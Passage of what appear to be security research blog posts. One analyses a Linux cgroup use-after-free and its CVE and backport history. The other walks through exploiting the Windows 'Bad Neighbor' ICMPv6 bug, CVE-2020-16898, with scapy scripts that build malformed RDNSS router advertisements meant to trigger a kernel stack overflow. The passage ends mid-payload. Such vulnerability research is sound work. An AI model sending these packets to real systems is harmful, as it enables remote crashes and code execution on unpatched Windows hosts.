[   72.121580]  dump_stack+0x50/0x70
[   72.121582]  cgroup_sk_alloc_disable.cold+0x11/0x25
                ^^^^^^^^^^^^^^^^^^^^^^^
[   72.121584]  net_prio_attach+0x22/0xa0
                ^^^^^^^^^^^^^^^
[   72.121586]  cgroup_migrate_execute+0x371/0x430
[   72.121587]  cgroup_attach_task+0x132/0x1f0
[   72.121588]  __cgroup1_procs_write.constprop.0+0xff/0x140
                ^^^^^^^^^^^^^^^^^^^^^^
[   72.121590]  kernfs_fop_write+0xc9/0x1a0
[   72.121592]  vfs_write+0xb1/0x1a0
[   72.121593]  ksys_write+0x5a/0xd0
[   72.121595]  do_syscall_64+0x47/0x190
[   72.121596]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   72.121598] RIP: 0033:0x48abdb
[   72.121599] Code: ff e9 69 ff ff ff cc cc cc cc cc cc cc cc cc e8 7b 68 fb ff 48 8b 7c 24 10 48 8b 74 24 18 48 8b 54 24 20 48 8b 44 24 08 0f 05 <48> 3d 01 f0 ff ff 76 20 48 c7 44 24 28 ff ff ff ff 48 c7 44 24 30
[   72.121600] RSP: 002b:000000c00110f778 EFLAGS: 00000212 ORIG_RAX: 0000000000000001
[   72.121601] RAX: ffffffffffffffda RBX: 000000c000060000 RCX: 000000000048abdb
[   72.121601] RDX: 0000000000000004 RSI: 000000c00110f930 RDI: 000000000000001e
[   72.121601] RBP: 000000c00110f7c8 R08: 000000c00110f901 R09: 0000000000000004
[   72.121602] R10: 000000c0011a39a0 R11: 0000000000000212 R12: 000000000000019b
[   72.121602] R13: 000000000000019a R14: 0000000000000200 R15: 0000000000000000

As we can see, net_prio is being activated and cgroup2 socket matching is being disabled. Next:

[  287.497527] percpu ref (cgroup_bpf_release_fn) <= 0 (-79) after switching to atomic
[  287.497535] WARNING: CPU: 0 PID: 9 at lib/percpu-refcount.c:161 percpu_ref_switch_to_atomic_rcu+0x11f/0x12a
[  287.497536] Modules linked in:
[  287.497537] CPU: 0 PID: 9 Comm: ksoftirqd/0 Kdump: loaded Not tainted 5.7.0-g6 #32
[  287.497538] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[  287.497539] RIP: 0010:percpu_ref_switch_to_atomic_rcu+0x11f/0x12a

cgroup_bpf_release_fn is being executed multiple times. All cgroup BPF entries have been deleted and freed. Next:

[  287.543976] general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] PREEMPT SMP PTI
[  287.544062] CPU: 0 PID: 11398 Comm: realpath Kdump: loaded Tainted: G        W         5.7.0-g6 #32
[  287.544133] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[  287.544217] RIP: 0010:__cgroup_bpf_run_filter_skb+0xd4/0x230
[  287.544267] Code: 00 48 01 c8 48 89 43 50 41 83 ff 01 0f 84 c2 00 00 00 e8 6f 55 f1 ff e8 5a 3e f5 ff 44 89 fa 48 8d 84 d5 e0 03 00 00 48 8b 00 <48> 8b 78 10 4c 8d 78 10 48 85 ff 0f 84 29 01 00 00 bd 01 00 00 00
[  287.544398] RSP: 0018:ffff957740003af8 EFLAGS: 00010206
[  287.544446] RAX: 6b6b6b6b6b6b6b6b RBX: ffff8911f339cf00 RCX: 0000000000000028
[  287.544506] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000001
[  287.544566] RBP: ffff8911e2eb5000 R08: 0000000000000000 R09: 0000000000000001
[  287.544625] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000014
[  287.544685] R13: 0000000000000014 R14: 0000000000000000 R15: 0000000000000000
[  287.544753] FS:  00007f86e885a580(0000) GS:ffff8911f6e00000(0000) knlGS:0000000000000000
[  287.544833] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  287.544919] CR2: 000055fb75e86da4 CR3: 0000000221316003 CR4: 00000000003606f0
[  287.544996] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  287.545063] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  287.545129] Call Trace:
[  287.545167]  <IRQ>
[  287.545204]  sk_filter_trim_cap+0x10c/0x250
[  287.545253]  ? nf_ct_deliver_cached_events+0xb6/0x120
[  287.545308]  ? tcp_v4_inbound_md5_hash+0x47/0x160
[  287.545359]  tcp_v4_rcv+0xb49/0xda0
[  287.545404]  ? nf_hook_slow+0x3a/0xa0
[  287.545449]  ip_protocol_deliver_rcu+0x26/0x1d0
[  287.545500]  ip_local_deliver_finish+0x50/0x60
[  287.545550]  ip_sublist_rcv_finish+0x38/0x50
[  287.545599]  ip_sublist_rcv+0x16d/0x200
[  287.545645]  ? ip_rcv_finish_core.constprop.0+0x470/0x470
[  287.545701]  ip_list_rcv+0xf1/0x115
[  287.545746]  __netif_receive_skb_list_core+0x249/0x270
[  287.545801]  netif_receive_skb_list_internal+0x19f/0x2c0
[  287.545856]  napi_complete_done+0x8e/0x130
[  287.545905]  e1000_clean+0x27e/0x600
[  287.545951]  ? security_cred_free+0x37/0x50
[  287.545999]  net_rx_action+0x133/0x3b0
[  287.546045]  __do_softirq+0xfc/0x331
[  287.546091]  irq_exit+0x92/0x110
[  287.546133]  do_IRQ+0x6d/0x120
[  287.546175]  common_interrupt+0xf/0xf
[  287.546219]  </IRQ>
[  287.546255] RIP: 0010:__x64_sys_exit_group+0x4/0x10

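We have our crash referencing freed memory: the non-canonical address 0x6b6b6b6b6b6b6b6b loaded into RAX is the slab POISON_FREE pattern (0x6b) which the kernel writes over freed objects when slab poisoning is enabled.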
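The faulting value can be sanity-checked with a few lines of Python. This is only an illustrative sketch: the poison bytes are the ones defined in the kernel's include/linux/poison.h, the helper names are made up for this example, and the canonical-address test assumes 48-bit virtual addresses (4-level paging).

```python
# Slab poison bytes from include/linux/poison.h.
POISON_BYTES = {
    0x6B: "POISON_FREE (object was freed)",
    0x5A: "POISON_INUSE (allocated, never initialized)",
    0xA5: "POISON_END (last byte of a poisoned object)",
}

def classify_poison(value: int):
    """Return a description if all 8 bytes of value are the same poison byte."""
    raw = value.to_bytes(8, "little")
    if len(set(raw)) == 1:
        return POISON_BYTES.get(raw[0])
    return None

def is_canonical(addr: int) -> bool:
    """Canonical x86-64 address check, assuming 48-bit virtual addresses."""
    top = addr >> 47              # bits 63..47 must all be equal
    return top == 0 or top == 0x1FFFF

rax = 0x6B6B6B6B6B6B6B6B          # RAX from the oops above
print(classify_poison(rax))
print(is_canonical(rax))
```

A register full of 0x6b bytes is a strong hint that a pointer was read from an already freed object, which is consistent with a use-after-free rather than a NULL pointer dereference.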

First CVE – CVE-2020-14356:

I decided to report this issue to the Linux kernel security mailing list around mid-July 2020. Roman Gushchin replied to my report and suggested that I verify whether I could still reproduce the issue with commit ad0f75e5f57c (“cgroup: fix cgroup_sk_alloc() for sk_clone_lock()”) applied. This commit had been merged into the Linux kernel git tree just a few days before my report. I carefully verified it and it did indeed fix the problem. However, commit ad0f75e5f57c is not complete on its own, and the follow-up fix 14b032b8f8fc (“cgroup: Fix sock_cgroup_data on big-endian.”) should be applied as well.


After this conversation Greg KH decided to backport Roman’s patches to the LTS kernels. In the meantime, I decided to apply for a CVE number (through RedHat) to track this issue:

  1. CVE-2020-14356 was allocated to track this issue
  2. For some unknown reason, this bug was classified as a NULL pointer dereference 🙂

RedHat correctly acknowledged this issue as Use-After-Free and in their own description and bugzilla they specify:

However, in CVE MITRE portal we can see a very inaccurate description:

  • “A flaw null pointer dereference in the Linux kernel cgroupv2 subsystem in versions before 5.7.10 was found in the way when reboot the system. A local user could use this flaw to crash the system or escalate their privileges on the system.”
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14356

First, it is not a NULL pointer dereference but a Use-After-Free bug. Maybe it was misclassified based on this bug report:
https://bugzilla.kernel.org/show_bug.cgi?id=208003

People have started to hit this Use-After-Free bug in the form of NULL pointer dereference “kernel panic”.

Additionally, the entire description of the bug is wrong. I’ve raised that concern with MITRE but the invalid description is still there. There is also a small Twitter discussion about that here:
https://twitter.com/Adam_pi3/status/1296212546043740160

Second CVE – CVE-2020-25220:

During analysis of this bug, I contacted Brad Spengler. When the patch for this issue was backported to LTS kernels, Brad noticed that it conflicted with his pre-existing backport, and that the upstream backport looked incorrect. I was surprised since I had reviewed the original commit for mainline kernel (5.7) and it was fine. Having this in mind, I decided to carefully review the backported patch:
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-4.14.y&id=82fd2138a5ffd7e0d4320cdb669e115ee976a26e

and it really looks incorrect. Part of the original fix is the following code:

+void cgroup_sk_clone(struct sock_cgroup_data *skcd)
+{
+   if (skcd->val) {
+       if (skcd->no_refcnt)
+           return;
+       /*
+        * We might be cloning a socket which is left in an empty
+        * cgroup and the cgroup might have already been rmdir'd.
+        * Don't use cgroup_get_live().
+        */
+       cgroup_get(sock_cgroup_ptr(skcd));
+       cgroup_bpf_get(sock_cgroup_ptr(skcd));
+   }
+}

However, the backported patch has the following logic:

+void cgroup_sk_clone(struct sock_cgroup_data *skcd)
+{
+   /* Socket clone path */
+   if (skcd->val) {
+       /*
+        * We might be cloning a socket which is left in an empty
+        * cgroup and the cgroup might have already been rmdir'd.
+        * Don't use cgroup_get_live().
+        */
+       cgroup_get(sock_cgroup_ptr(skcd));
+   }
+}

There is a missing check:

+       if (skcd->no_refcnt)
+           return;

which could result in a reference counting bug and, in the end, a Use-After-Free again. It looks like the backported patch for stable kernels is still buggy.

I’ve contacted RedHat again and they started to provide correct patches for their own kernels. However, LTS kernels were still buggy. I’ve also asked to assign a separate CVE for that issue but RedHat suggested that I do it myself.

After that, I went on vacation and forgot about this issue 🙂 Recently, I decided to apply for a CVE to track the “bad patch” issue, and CVE-2020-25220 was allocated. It is worth pointing out that someone from Huawei realized at some point that the patch was wrong, and LTS got a correct fix as well:

https://www.spinics.net/lists/stable/msg405099.html

It is worth mentioning that the grsecurity backport was never affected by CVE-2020-25220.

Summary:

The original issue, tracked by CVE-2020-14356, affects kernels from 4.5 up to 5.7.10.

  • RedHat correctly fixed all their kernels, and has a proper description of the bug
  • CVE MITRE still has an invalid and misleading description

Badly backported patch, tracked by CVE-2020-25220, affects kernels:

  • 4.19 until version 4.19.140 (exclusive)
  • 4.14 until version 4.14.194 (exclusive)
  • 4.9 until version 4.9.233 (exclusive)

*grsecurity kernels were never affected by the CVE-2020-25220
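The ranges above can be turned into a small helper for triaging a kernel version string. This is a minimal sketch with hypothetical function names. It only encodes the upper bounds listed above: the source does not say in which release the bad backport first landed, so a True result means "older than the corrected release", not "definitely vulnerable", and vendor kernels with their own backports are out of scope.

```python
# First corrected release per stable series, taken from the summary above.
FIXED_IN = {
    (4, 19): 140,
    (4, 14): 194,
    (4, 9): 233,
}

def parse_version(text: str):
    """Split 'MAJOR.MINOR.PATCH'; suffixes such as '-generic' are ignored."""
    core = text.split("-", 1)[0]
    parts = [int(p) for p in core.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])

def predates_fix(version: str):
    """True/False for a listed series, None for a series not listed above."""
    major, minor, patch = parse_version(version)
    fixed = FIXED_IN.get((major, minor))
    if fixed is None:
        return None
    return patch < fixed

for v in ("4.19.139", "4.19.140", "4.14.193-generic", "5.7.10"):
    print(v, predates_fix(v))
```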


Best regards,
Adam ‘pi3’ Zabrocki

CVE-2020-16898 – Exploiting “Bad Neighbor” vulnerability

16 October 2020 at 18:57
By: pi3

Introduction

During the last Patch Tuesday (13th of October 2020), Microsoft fixed a very interesting (and sexy) vulnerability: CVE-2020-16898 – Windows TCP/IP Remote Code Execution Vulnerability (link). Microsoft’s description of the vulnerability:

“A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client.
To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.”

This vulnerability is so important that I decided to write a Proof-of-Concept for it. While I was working on it, there weren’t any public exploits. I spent a significant amount of time analyzing all the caveats involved in triggering the bug. Even now, the available information doesn’t provide sufficient detail for triggering it. That’s why I’ve decided to summarize my experience. First, a short summary:

  • This bug can ONLY be exploited when the source address is a link-local IPv6 address. This requirement limits the potential targets!
  • The entire payload must be a valid IPv6 packet. If you screw up the headers too much, your packet will be rejected before triggering the bug
  • During validation of the packet size, every “Length” defined in the optional headers must match the packet size
  • This vulnerability allows an attacker to smuggle an extra “header”. This header is not validated and includes a “Length” field. After triggering the bug, this field will be checked against the packet size anyway.
  • The Windows NDIS API, which can trigger the bug, has a very annoying optimization (from the exploitation perspective). To bypass it, you need to use fragmentation! Otherwise, you can trigger the bug, but it won’t result in memory corruption!

Collecting information about the vulnerability

At first, I wanted to learn more about the bug. The only extra information I could find was in the write-ups describing the detection logic. It is quite a funny twist of fate that information on how to protect against the attack was helpful in exploiting it 🙂 Write-ups:

The most crucial is the following information:

“While we ignore all Options that aren’t RDNSS, for Option Type = 25 (RDNSS), we check to see if the Length (second byte in the Option) is an even number. If it is, we flag it. If not, we continue. Since the Length is counted in increments of 8 bytes, we multiply the Length by 8 and jump ahead that many bytes to get to the start of the next Option (subtracting 1 to account for the length byte we’ve already consumed).”

OK, what have we learned from it? Quite a lot:

  • We need to send an RDNSS packet
  • The problem is an even number in the Length field
  • The function responsible for parsing the packet will treat the last 8 bytes of the RDNSS payload as the next header
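The quoted detection logic can be sketched in plain Python. This is an illustration of the description above, not the code of any particular detection rule; the function name is made up, and it operates on the raw bytes of the options that follow the Router Advertisement header.

```python
RDNSS_TYPE = 25  # Recursive DNS Server option

def find_even_length_rdnss(options: bytes):
    """Return offsets of RDNSS options whose Length field is even."""
    hits = []
    offset = 0
    while offset + 2 <= len(options):
        opt_type = options[offset]
        opt_len = options[offset + 1]   # in units of 8 bytes
        if opt_len == 0:
            break                       # zero-length options are invalid
        if opt_type == RDNSS_TYPE and opt_len % 2 == 0:
            hits.append(offset)
        offset += opt_len * 8           # jump to the start of the next option
    return hits

good = bytes([25, 3]) + bytes(22)  # Length 3: one address, 24 bytes in total
bad = bytes([25, 4]) + bytes(30)   # Length 4: even, 32 bytes in total
print(find_even_length_rdnss(good + bad))  # prints [24]
```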

That’s more than enough to start poking around. First, we need to generate a valid RDNSS packet.

RDNSS

Recursive DNS Server Option (RDNSS) is one of the sub-options for Router Advertisement (RA) message. RA can be sent via ICMPv6. Let’s look at the documentation for RDNSS (https://tools.ietf.org/html/rfc5006):

5.1. Recursive DNS Server Option
The RDNSS option contains one or more IPv6 addresses of recursive DNS
servers. All of the addresses share the same lifetime value. If it
is desirable to have different lifetime values, multiple RDNSS
options can be used. Figure 1 shows the format of the RDNSS option.

  0                   1                   2                   3
  0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |     Type      |     Length    |           Reserved            |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                           Lifetime                            |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                                                               |
 :            Addresses of IPv6 Recursive DNS Servers            :
 |                                                               |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Description of the Length field:

 Length        8-bit unsigned integer.  The length of the option
               (including the Type and Length fields) is in units of
               8 octets.  The minimum value is 3 if one IPv6 address
               is contained in the option.  Every additional RDNSS
               address increases the length by 2.  The Length field
               is used by the receiver to determine the number of
               IPv6 addresses in the option.

This essentially means that Length must always be an odd number as long as there is any payload.
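The relation between the number of addresses and the Length field can be checked with a short sketch that serializes the option by hand, following the layout from the RFC figure above. The helper names and the default lifetime of 0xFFFFFFFF are assumptions made for this example.

```python
import ipaddress
import struct

def rdnss_length(num_addresses: int) -> int:
    """Length field (in 8-octet units) for an option with N addresses."""
    return 1 + 2 * num_addresses

def build_rdnss(addresses, lifetime=0xFFFFFFFF) -> bytes:
    """Serialize an RDNSS option: Type, Length, Reserved, Lifetime, addresses."""
    header = struct.pack("!BBHI", 25, rdnss_length(len(addresses)), 0, lifetime)
    body = b"".join(ipaddress.IPv6Address(a).packed for a in addresses)
    return header + body

opt = build_rdnss(["aaaa::1"] * 3)
print(opt[1], len(opt))  # prints 7 56
```

Three addresses give Length 7, and 7 * 8 = 56 bytes is exactly the 8-byte header plus 3 * 16 bytes of addresses. An even Length can never describe a whole number of addresses.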
OK, let’s create an RDNSS packet. How to do it? I’m using scapy since it’s the easiest and fastest way of creating any packet we want. It is very simple:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 7
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

When we set up a kernel debugger and analyze all the public symbols from the tcpip.sys driver, we can find interesting function names:

tcpip!Ipv6pHandleRouterAdvertisement
tcpip!Ipv6pUpdateRDNSS

Let’s try to set breakpoints there and see if our packet arrives:

0: kd> bp tcpip!Ipv6pUpdateRDNSS
0: kd> bp tcpip!Ipv6pHandleRouterAdvertisement
0: kd> g
Breakpoint 0 hit
tcpip!Ipv6pHandleRouterAdvertisement:
fffff804`483ba398 48895c2408      mov     qword ptr [rsp+8],rbx
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a66ad8 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement
01 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
02 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
03 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
04 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
05 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
06 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
07 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
08 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
09 fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
0a fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
0b fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
0c fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
0d fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0
0: kd> g
...

Hm… OK. We never hit Ipv6pUpdateRDNSS but we did hit Ipv6pHandleRouterAdvertisement. This means that our packet is fine. Why the hell did we not end up in Ipv6pUpdateRDNSS?

Problem 1 – IPv6 link-local address

We are failing validation of the address here:

fffff804`483ba4b4 458a02          mov     r8b,byte ptr [r10]
fffff804`483ba4b7 8d5101          lea     edx,[rcx+1]
fffff804`483ba4ba 8d5902          lea     ebx,[rcx+2]
fffff804`483ba4bd 41b7c0          mov     r15b,0C0h
fffff804`483ba4c0 4180f8ff        cmp     r8b,0FFh
fffff804`483ba4c4 0f84a8820b00    je      tcpip!Ipv6pHandleRouterAdvertisement+0xb83da (fffff804`48472772)
fffff804`483ba4ca 33c0            xor     eax,eax
fffff804`483ba4cc 498bca          mov     rcx,r10
fffff804`483ba4cf 48898570010000  mov     qword ptr [rbp+170h],rax
fffff804`483ba4d6 48898578010000  mov     qword ptr [rbp+178h],rax
fffff804`483ba4dd 4484d2          test    dl,r10b
fffff804`483ba4e0 0f8599820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb83e7 (fffff804`4847277f)
fffff804`483ba4e6 4180f8fe        cmp     r8b,0FEh
fffff804`483ba4ea 0f85ab820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb8403 (fffff804`4847279b) [br=0]

r10 points to the beginning of the address:

0: kd> dq @r10
ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d
ffffcb82`f9a5b04a  000052b0`80db12fd b7220a02`ea3b3a4d
ffffcb82`f9a5b05a  08070800`e56c0086 00000000`00000000
ffffcb82`f9a5b06a  ffffffff`00000719 aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b07a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b08a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b09a  aaaaaaaa`aaaaaaaa 63733a6e`12990c28
ffffcb82`f9a5b0aa  70752d73`616d6568 643a6772`6f2d706e

These bytes:

ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d

are matching my IPv6 address which I’ve used as a source address:

v6_src = "fd12:db80:b052:0:5d7b:5d64:7c08:f5e5"

The first byte of the address is compared with 0xFE. By looking here, we can learn that:

fe80::/10 — Addresses in the link-local prefix are only valid and unique on a single link (comparable to the auto-configuration addresses 169.254.0.0/16 of IPv4).
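The match between the memory dump and the source address, and the fact that this address is not link-local, can be reproduced offline. The sketch below uses only the Python standard library; the helper name is made up, and `is_link_local` tests membership in fe80::/10, which is not claimed to mirror the driver's checks instruction by instruction.

```python
import ipaddress
import struct

def address_from_dq(qword_lo: int, qword_hi: int) -> ipaddress.IPv6Address:
    """Rebuild an IPv6 address from two little-endian qwords as shown by `dq`."""
    return ipaddress.IPv6Address(struct.pack("<QQ", qword_lo, qword_hi))

# First line of the `dq @r10` output above.
src = address_from_dq(0x000052B080DB12FD, 0xE5F5087C645D7B5D)
print(src)                       # the fd12:... source address used above
print(hex(src.packed[0]))        # first byte, the one compared with 0xFE
print(src.is_link_local)         # False

# The link-local source address used later in the Proof-of-Concept.
print(ipaddress.IPv6Address("fe80::24f5:a2ff:fe30:8890").is_link_local)  # True
```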

OK, so it is looking for the link-local prefix. Another interesting check is performed when we fail the previous one:

fffff804`4847279b e8f497f8ff      call    tcpip!IN6_IS_ADDR_LOOPBACK (fffff804`483fbf94)
fffff804`484727a0 84c0            test    al,al
fffff804`484727a2 0f85567df4ff    jne     tcpip!Ipv6pHandleRouterAdvertisement+0x166 (fffff804`483ba4fe)
fffff804`484727a8 4180f8fe        cmp     r8b,0FEh
fffff804`484727ac 7515            jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb842b (fffff804`484727c3)

It checks whether we are coming from the LOOPBACK address, and next we are validated again for being link-local. I’ve modified the packet to use a link-local address and…

Breakpoint 1 hit
tcpip!Ipv6pUpdateRDNSS:
fffff804`4852a534 4055            push    rbp
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a66728 fffff804`48472cbf tcpip!Ipv6pUpdateRDNSS
01 fffff804`48a66730 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement+0xb8927
02 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
03 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
04 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
05 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
06 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
07 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
08 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
09 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
0a fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
0b fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
0c fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
0d fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
0e fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0

Works! OK, let’s move on to triggering the bug.

Triggering the bug

What we know from the detection logic write-up:

“we check to see if the Length (second byte in the Option) is an even number”

Let’s test it:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 6
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

and we end up executing this code:

fffff804`4852a5b3 4c8b15be8b0700  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)]
fffff804`4852a5ba e8113bceff      call    fffff804`4820e0d0
fffff804`4852a5bf 418bd7          mov     edx,r15d
fffff804`4852a5c2 498bce          mov     rcx,r14
fffff804`4852a5c5 488bd8          mov     rbx,rax
fffff804`4852a5c8 e8a39de5ff      call    tcpip!NetioAdvanceNetBuffer (fffff804`48384370)
fffff804`4852a5cd 0fb64301        movzx   eax,byte ptr [rbx+1]
fffff804`4852a5d1 8d4e01          lea     ecx,[rsi+1]
fffff804`4852a5d4 2bc6            sub     eax,esi
fffff804`4852a5d6 4183cfff        or      r15d,0FFFFFFFFh
fffff804`4852a5da 99              cdq
fffff804`4852a5db f7f9            idiv    eax,ecx
fffff804`4852a5dd 8b5304          mov     edx,dword ptr [rbx+4]
fffff804`4852a5e0 8945b7          mov     dword ptr [rbp-49h],eax
fffff804`4852a5e3 8bf0            mov     esi,eax
fffff804`4852a5e5 413bd7          cmp     edx,r15d
fffff804`4852a5e8 7412            je      tcpip!Ipv6pUpdateRDNSS+0xc8 (fffff804`4852a5fc)

Essentially, it subtracts 1 from the Length field and the result is divided by 2. This follows the documentation logic and can be summarized as:

tmp = (Length - 1) / 2

This logic generates the same result for an odd number and for the even number that follows it:

(8 - 1) / 2 => 3
(7 - 1) / 2 => 3

There is nothing wrong with that by itself. However, this also “defines” how long the packet is. Since IPv6 addresses are 16 bytes long, when an even number is provided, the last 8 bytes of the payload will be used as the beginning of the next header. We can see that in Wireshark as well:

[Image: Wireshark capture of the packet]
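The arithmetic can be modeled in a few lines. This is a model of the calculation described above, not the driver's actual code, and the function name is made up for the example.

```python
def rdnss_parse_model(length_field: int):
    """Return (addresses parsed, leftover bytes) for a given Length value."""
    declared = length_field * 8            # bytes the Length field claims
    addresses = (length_field - 1) // 2    # tmp = (Length - 1) / 2
    consumed = 8 + addresses * 16          # 8-byte header + whole addresses
    return addresses, declared - consumed

for length in (7, 8, 6):
    print(length, rdnss_parse_model(length))
# prints:
# 7 (3, 0)
# 8 (3, 8)
# 6 (2, 8)
```

For every even Length, 8 bytes inside the declared option are not covered by any address. Those are the bytes that end up being interpreted as the start of the next header.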

That’s pretty interesting. However, what to do with that? What next header should we fake? Why does this matter at all? Well… it took me some time to figure this out. To be honest, I wrote a simple fuzzer to find out 🙂

Hunting for the correct header(s) (Problem 2)

If we look in the documentation at the available headers / options, we don’t really know which one to use (https://www.iana.org/assignments/icmpv6-parameters/icmpv6-parameters.xml):

What we do know is that ICMPv6 messages have the following general format:

       0                   1                   2                   3
       0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |     Type      |     Code      |          Checksum             |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                                                               |
      +                         Message Body                          +
      |                                                               |

The first byte encodes the “type” of the message. As a test, I generated a next header exactly the same as the “buggy” RDNSS one. I kept hitting the breakpoint for tcpip!Ipv6pUpdateRDNSS, but tcpip!Ipv6pHandleRouterAdvertisement was hit only once. I fired up IDA Pro and started to analyze what was going on and what logic was being executed. After some reverse engineering I realized that we have 2 loops in the code:

  1. The first loop goes through all the headers and does some basic validation (size, length, etc.)
  2. The second loop doesn’t do any more validation but parses the packet.

As long as there are more ‘optional headers’ in the buffer, we stay in the loop. That’s a very good primitive! Anyway, I still didn’t know which headers should be used, so I brute-forced all the ‘optional header’ types with the bug triggered and found out that the second loop cares only about:

  • Type 3 (Prefix Information)
  • Type 24 (Route Information)
  • Type 25 (RDNSS)
  • Type 31 (DNS Search List Option)

I’ve analyzed Type 24 logic since it was much “smaller / shorter” than Type 3.

Stack overflow

OK. Let’s try to generate the malicious RDNSS packet “faking” Route Information as a next one:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 6
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:03AA:AAAA:AAAA:AAAA" ]

